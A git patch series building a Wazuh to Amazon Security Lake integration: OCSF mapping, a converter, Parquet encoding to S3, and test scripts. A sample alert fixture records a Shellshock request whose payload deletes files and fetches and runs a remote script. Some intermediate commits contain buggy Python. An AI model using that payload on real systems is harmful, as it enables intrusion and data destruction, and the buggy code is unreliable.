datetime import datetime -from pyarrow import parquet, Table +from pyarrow import parquet, Table, fs block_ending = { "block_ending": True } +s3 = fs.S3FileSystem(region='eu-west-3') + def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html From 8949097be444871ed6db264c1133c1d005f6fdf3 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 17:03:00 -0300 Subject: [PATCH 31/77] Write parquet directly to bucket --- integrations/stdin_to_securitylake.py | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d176bb38b004e..2b8a1de14755b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -16,15 +16,16 @@ def map_to_ocsf(): ## Code that translates fields to OCSF -def encode_parquet(list): +def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html + table = Table.from_pylist(list) - parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) def read_block(fileobject,length): output=[] @@ -42,10 +43,12 @@ def get_elapsedseconds(reference_timestamp): def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') + parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') + parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') + parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') @@ -77,7 +80,7 @@ def parse_arguments(): output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) + encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From eb7ace3c3c4a02388596c36584766deb06a902da Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:08:52 -0300 Subject: [PATCH 32/77] Added basics of map_to_ocsf() function --- integrations/ocsf-mapping.json | 42 +++++++++++++++++++++++++++ integrations/stdin_to_securitylake.py | 22 +++++++++++--- 2 files changed, 60 insertions(+), 4 deletions(-) create mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json new file mode 100644 index 0000000000000..b2cf6d3b8d3f7 --- /dev/null +++ b/integrations/ocsf-mapping.json @@ -0,0 +1,42 @@ +{ + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "state_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.type" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } +} diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 2b8a1de14755b..d125a2ff6d56b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -11,17 +11,30 @@ block_ending = { "block_ending": True } -s3 = fs.S3FileSystem(region='eu-west-3') +s3 = fs.S3FileSystem() -def map_to_ocsf(): - ## Code that translates fields to OCSF +def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): + ocsf_alert = {} + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) + ### Put constants into the output alert + ocsf_alert |= mappings['constants'] + + for key in mappings['mappings']: + dotted_destination_field = mappings['mappings'].get(key) + depth_levels = dotted_destination.split('.') + current_level = alert_dictionary[depth_levels[0]] + if len(depth_levels>1): + for field in depth_levels[1:]: + current_level = current_level[field] + ocsf_alert[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### - ### Credentials can be stored in /root/.aws/credentials + ### Credentials can be stored in ~/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) @@ -49,6 +62,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') From 3d7b8ff585d5680fce00a5cdf60bbce2b3c5307f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:41:04 -0300 Subject: [PATCH 33/77] Minor fixes --- integrations/stdin_to_securitylake.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d125a2ff6d56b..51cb67a49ac29 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -42,11 +42,12 @@ def encode_parquet(list,bucket_name,folder): def read_block(fileobject,length): output=[] - for i in range(0,length): + for line in range(0,length): line = fileobject.readline() if line == '': output.append(block_ending) break + alert = json.loads(line) output.append(json.loads(line)) return output From 545f855a679015d214c04588fb7758311701cc0c Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:54:18 -0300 Subject: [PATCH 34/77] Map alerts to OCSF as they are read --- integrations/stdin_to_securitylake.py | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 51cb67a49ac29..3a6145747783a 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,12 +13,10 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): - ocsf_alert = {} - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) +def map_to_ocsf(alert_dictionary, mappings, ocsf_output): + ocsf_output = {} ### Put constants into the output alert - ocsf_alert |= mappings['constants'] + ocsf_output |= mappings['constants'] for key in mappings['mappings']: dotted_destination_field = mappings['mappings'].get(key) @@ -27,7 +25,7 @@ def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): if len(depth_levels>1): for field in depth_levels[1:]: current_level = current_level[field] - ocsf_alert[key] = current_level + ocsf_output[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -38,17 +36,19 @@ def encode_parquet(list,bucket_name,folder): ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def read_block(fileobject,length): +def map_block(fileobject, length, mappings): output=[] - for line in range(0,length): + for line in range(0, length): line = fileobject.readline() if line == '': output.append(block_ending) break alert = json.loads(line) - output.append(json.loads(line)) + ocsf_mapped_alert = {} + map_to_ocsf(alert, mappings, ocsf_mapped_alert): + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -77,6 +77,8 @@ def parse_arguments(): logging.info('BUFFERING STDIN') try: + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: output_buffer = [] @@ -90,7 +92,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = read_block(stdin,args.linebuffer) + current_block = map_block(stdin, args.linebuffer, mappings) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From f753b1235f54b6b94dc94f242808256829e40e94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 8 Feb 2024 19:45:53 +0100 Subject: [PATCH 35/77] Add script to convert Wazuh events to OCSF Also adds a simple test script --- .../amazon-security-lake/ocsf/__init__.py | 2 + .../amazon-security-lake/ocsf/converter.py | 82 +++++++++++++++++ .../amazon-security-lake/ocsf/test.py | 15 ++++ .../ocsf/wazuh-event.sample.json | 90 +++++++++++++++++++ 4 files changed, 189 insertions(+) create mode 100644 integrations/amazon-security-lake/ocsf/__init__.py create mode 100644 integrations/amazon-security-lake/ocsf/converter.py create mode 100644 integrations/amazon-security-lake/ocsf/test.py create mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py new file mode 100644 index 0000000000000..777a7d20549b5 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/__init__.py @@ -0,0 +1,2 @@ +# Python module placeholder +# TODO export submodules \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py new file mode 100644 index 0000000000000..a9168aead1e1a --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -0,0 +1,82 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string + "name": event["_source"]["decoder"]["name"], + "type": "Rule", # analytic.type is redundant together with type_id + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object + "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + # Skipped. + # OCSF description of this field is: The version of the product, as + # defined by the event source. For example: 2013.1.3-beta. We do not + # save such info as part of the event data. + # "version": "4.9.0", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/ocsf/test.py new file mode 100644 index 0000000000000..e7d947848b067 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/test.py @@ -0,0 +1,15 @@ +#!/usr/bin/python + +from converter import convert +import json + +converted_event = {} +with open("wazuh-event.sample.json", "r") as fd: + sample_event = json.load(fd) + # print(json.dumps(sample_event, indent=4)) + converted_event = convert(sample_event) + +if converted_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(converted_event, fd) + print("Done") \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json new file mode 100644 index 0000000000000..3f35697a9fe36 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json @@ -0,0 +1,90 @@ +{ + "_index": "wazuh-alerts-4.x-2024.02.08", + "_id": "yBMliY0Bt8FzffO0BOIu", + "_version": 1, + "_score": null, + "_source": { + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" + }, + "fields": { + "timestamp": [ + "2024-02-08T14:35:14.334Z" + ] + }, + "sort": [ + 1707402914334 + ] +} \ No newline at end of file From dcc119e07edfff1c99655a0755c9632662a662fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:34 +0100 Subject: [PATCH 36/77] Add OCSF converter + Parquet encoder + test scripts --- integrations/amazon-security-lake/.gitignore | 3 + .../{ => logstash}/pipe-output.conf | 0 .../{ => logstash}/wazuh-s3.conf | 1 + .../amazon-security-lake/ocsf/converter.py | 125 +++++++++--------- .../amazon-security-lake/parquet/parquet.py | 20 +++ .../amazon-security-lake/parquet/test.py | 11 ++ .../amazon-security-lake/requirements.txt | 2 + 7 files changed, 102 insertions(+), 60 deletions(-) create mode 100644 integrations/amazon-security-lake/.gitignore rename integrations/amazon-security-lake/{ => logstash}/pipe-output.conf (100%) rename integrations/amazon-security-lake/{ => logstash}/wazuh-s3.conf (97%) create mode 100644 integrations/amazon-security-lake/parquet/parquet.py create mode 100644 integrations/amazon-security-lake/parquet/test.py create mode 100644 integrations/amazon-security-lake/requirements.txt diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore new file mode 100644 index 0000000000000..56bf77e1b8d6f --- /dev/null +++ b/integrations/amazon-security-lake/.gitignore @@ -0,0 +1,3 @@ +.venv/ +wazuh-event.ocsf.json +*.parquet \ No newline at end of file diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipe-output.conf similarity index 100% rename from integrations/amazon-security-lake/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipe-output.conf diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/wazuh-s3.conf similarity index 97% rename from integrations/amazon-security-lake/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/wazuh-s3.conf index 108423afd3193..6ca2ca0d5a08f 100644 --- a/integrations/amazon-security-lake/wazuh-s3.conf +++ b/integrations/amazon-security-lake/logstash/wazuh-s3.conf @@ -15,6 +15,7 @@ input { } } }' + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index a9168aead1e1a..fba84e7304dc7 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -3,6 +3,7 @@ # event comes from Filebeat event = {} + def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. @@ -10,73 +11,77 @@ def normalize(level: int) -> int: # TODO normalization return level + +def join(iterable, separator=","): + return (separator.join(iterable)) + + def convert(event: dict) -> dict: """ Converts Wazuh events to OCSF's Detecting Finding (2004) class. """ ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string - "name": event["_source"]["decoder"]["name"], - "type": "Rule", # analytic.type is redundant together with type_id - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object - "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - # Skipped. - # OCSF description of this field is: The version of the product, as - # defined by the event source. For example: 2013.1.3-beta. We do not - # save such info as part of the event data. - # "version": "4.9.0", - "lang": "en", - "vendor_name": "Wazuh, Inc,." + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["_source"]["rule"]["mitre"]["technique"]), + "uid": join(event["_source"]["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] }, - "version": "1.1.0", - }, - "raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } } - } - return ocsf_class_template \ No newline at end of file + return ocsf_class_template diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py new file mode 100644 index 0000000000000..79a146f0993a2 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/parquet.py @@ -0,0 +1,20 @@ + +import pyarrow as pa +import pyarrow.parquet as pq +import pyarrow.fs as pafs + + +class Parquet: + + @staticmethod + def encode(data: dict): + return pa.Table.from_pydict(data) + + @staticmethod + def to_s3(data: pa.Table, s3: pafs.S3FileSystem): + pass + + @staticmethod + def to_file(data: pa.Table, path: str): + # pq.write_to_dataset(table=data, root_path=path) + pq.write_table(data, path) diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py new file mode 100644 index 0000000000000..2022111b25e33 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/test.py @@ -0,0 +1,11 @@ +#!/usr/bin/python + +import pyarrow as pa +from parquet import Parquet +import json + +# converted_event = {} +with open("wazuh-event.ocsf.json", "r") as fd: + events = [json.load(fd)] + table = pa.Table.from_pylist(events) + Parquet.to_file(table, "output/wazuh-event.ocsf.parquet") diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt new file mode 100644 index 0000000000000..8c7a1cbaae79b --- /dev/null +++ b/integrations/amazon-security-lake/requirements.txt @@ -0,0 +1,2 @@ +pyarrow>=10.0.1 +parquet-tools>=0.2.15 \ No newline at end of file From 5c5ff2460219e16dae716f2b4cb3e4b4e493b391 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:43 +0100 Subject: [PATCH 37/77] Update .gitignore --- integrations/amazon-security-lake/.gitignore | 180 ++++++++++++++++++- 1 file changed, 178 insertions(+), 2 deletions(-) diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore index 56bf77e1b8d6f..0740f723d0c79 100644 --- a/integrations/amazon-security-lake/.gitignore +++ b/integrations/amazon-security-lake/.gitignore @@ -1,3 +1,179 @@ -.venv/ wazuh-event.ocsf.json -*.parquet \ No newline at end of file +*.parquet + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file From a39ef909d11c4941551e63956b4ef7822c745a29 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 08:19:39 -0300 Subject: [PATCH 38/77] Include the contents of the alert under unmapped --- integrations/stdin_to_securitylake.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 3a6145747783a..09fba3ad554d4 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -26,6 +26,9 @@ def map_to_ocsf(alert_dictionary, mappings, ocsf_output): for field in depth_levels[1:]: current_level = current_level[field] ocsf_output[key] = current_level + ### We probably need to crop the fields we already + ### mapped to OCSF from ocsf_output + ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: From 97725bcd97667aff3664055447814bf277b6b89d Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 11:44:40 -0300 Subject: [PATCH 39/77] Add support for different OCSF schema versions --- integrations/ocsf-mapping.json | 116 ++++++++++++++++++-------- integrations/stdin_to_securitylake.py | 13 +-- 2 files changed, 87 insertions(+), 42 deletions(-) diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json index b2cf6d3b8d3f7..c1238dac285df 100644 --- a/integrations/ocsf-mapping.json +++ b/integrations/ocsf-mapping.json @@ -1,42 +1,86 @@ { - "constants": + "1.0.0": { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "state_id" : 99, - "type_uid" : 200101 + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : 